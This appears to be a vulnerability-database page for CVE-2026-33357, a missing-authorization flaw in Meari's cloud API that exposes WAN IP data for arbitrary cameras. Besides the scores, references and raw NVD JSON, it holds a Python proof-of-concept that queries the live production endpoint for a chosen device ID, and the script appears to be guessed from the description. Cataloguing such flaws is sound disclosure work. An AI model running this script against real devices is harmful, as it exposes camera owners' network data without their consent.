CVE-2026-33357

Description

In Meari client applications embedding "com.meari.sdk" (including CloudEdge 5.5.0 build 220, Arenti 1.8.1 build 220, and related white-label <= 1.8.x), the integrated call path to openapi-euce.mearicloud.com can be abused to retrieve WAN IP data for arbitrary devices. The root cause is a server-side authorization failure in "GET /openapi/device/status".

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

CloudEdge 5.5.0 build 220

Arenti 1.8.1 build 220

Meari SDK 相关白标版本 <= 1.8.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target endpoint based on the vulnerability description
target_url = "https://openapi-euce.mearicloud.com/openapi/device/status"

# Headers to mimic a legitimate client request if necessary (though auth is not required)
headers = {
    "User-Agent": "Meari-Scanner/1.0",
    "Accept": "application/json"
}

# Parameters to request status of an arbitrary device
# In a real attack, the attacker would iterate or guess device IDs
params = {
    "deviceId": "TARGET_DEVICE_ID_HERE"  # Replace with the target device ID
}

try:
    # Sending the GET request without authentication
    response = requests.get(target_url, headers=headers, params=params, timeout=10)
    
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Device Status Data:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33357
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33357
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33357/
[4] VulDB https://vuldb.com/cve/CVE-2026-33357
[5] https://github.com/xn0tsa/nobody-puts-baby-in-a-corner
[6] https://www.runzero.com/advisories/meari-openapi-device-status-idor-cve-2026-33357/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33357", "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "published": "2026-05-11T17:16:30.730", "lastModified": "2026-05-11T17:16:30.730", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Meari client applications embedding \"com.meari.sdk\" (including CloudEdge 5.5.0 build 220, Arenti 1.8.1 build 220, and related white-label <= 1.8.x), the integrated call path to openapi-euce.mearicloud.com can be abused to retrieve WAN IP data for arbitrary devices. The root cause is a server-side authorization failure in \"GET /openapi/device/status\"."}], "metrics": {"cvssMetricV31": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/xn0tsa/nobody-puts-baby-in-a-corner", "source": "44488dab-36db-4358-99f9-bc116477f914"}, {"url": "https://www.runzero.com/advisories/meari-openapi-device-status-idor-cve-2026-33357/", "source": "44488dab-36db-4358-99f9-bc116477f914"}]}}